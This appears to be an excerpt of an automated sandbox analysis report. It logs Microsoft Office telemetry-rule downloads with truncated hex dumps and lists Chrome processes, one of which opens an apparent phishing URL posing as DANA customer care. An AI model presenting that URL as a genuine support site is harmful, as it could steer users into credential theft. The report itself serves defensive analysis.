                                                  2024-10-13 17:34:36 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:36 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1403
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                  ETag: "0x8DC582BEB866CDB"
                                                  x-ms-request-id: 052d5199-001e-0017-8073-1d0c3c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173436Z-17db6f7c8cf6qp7g7r97wxgbqc00000004f000000000dncz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:36 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  148192.168.2.44991313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:36 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:36 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1362
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                  ETag: "0x8DC582BEB256F43"
                                                  x-ms-request-id: ff135f01-c01e-002b-23eb-1b6e00000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173436Z-17db6f7c8cf8rgvlb86c9c009800000003d0000000002cxs
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:36 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  149192.168.2.44991613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:36 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:37 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:37 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1399
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                  ETag: "0x8DC582BE976026E"
                                                  x-ms-request-id: f0362bac-601e-005c-101b-1cf06f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173437Z-17db6f7c8cfvtw4hh2496wp8p800000003mg00000000bqvx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:37 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:13:33:17
                                                  Start date:13/10/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                  Imagebase:0x7ff76e190000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:13:33:21
                                                  Start date:13/10/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2320,i,17996028605859192159,13445879182102012152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                  Imagebase:0x7ff76e190000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:3
                                                  Start time:13:33:23
                                                  Start date:13/10/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bantuan-customer-care-dana.officio.asia/"
                                                  Imagebase:0x7ff76e190000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  No disassembly